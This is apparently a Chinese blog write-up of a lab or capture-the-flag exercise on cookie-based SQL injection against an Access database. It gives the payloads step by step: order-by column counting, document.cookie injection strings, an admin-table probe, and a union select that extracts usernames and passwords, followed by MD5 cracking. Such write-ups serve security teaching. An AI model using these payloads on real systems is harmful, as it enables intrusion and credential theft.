Access-Cookie注入
地址:http://59.63.200.79:8004/
Access-cookie注入
首先尝试显错注入或者别的 加引号测试:
可能存在过滤非法字符,发现无法直接进行SQL注入:上面的字符不能出现,我们可以使用order by 判断字段数:?id=171 order by 11 ?id=171 order by 10
说明存在十个字段。
通过cookie修改页面id:document.cookie=”id=169”
发现cookie可以传参,在尝试cookie是否会被过滤:document.cookie=”id=”+escape(“171 and 1=2”)
发现cookie没有被过滤 存在注入可能性:查询admin表是否存在:exists()判断是否括号里存在查询到的东西:document.cookie=”id=”+escape(“171 and exists(select * from admin )”)
发现可以正常执行,说明存在admin表,然后我们之前还知道了字段数为十,接下来寻找回显点,使用联合查询:document.cookie=”id=”+escape(“171
union select 1,2,3,4,5,6,7,8,9,10 from admin “)
然后根据显错点输出密码账号:document.cookie=”id=”+escape(“171 union select 1,2,3,4,5,6,username,password,9,10 from admin “)
密码使用MD5解密:b9a2a2b5dffb918c
输入后台 获得flag.
-------------------------------------------
个性签名:你有一个苹果,我有一个苹果,我们交换一下,一人还是只有一个苹果;你有一种思想,我有一种思想,我们交换一下,一个人就有两种思想。
如果觉得这篇文章对你有小小的帮助的话,记得在右下角点个“推荐”哦,博主在此感谢!
独学而无友,则孤陋而寡闻,开源、分享、白嫖!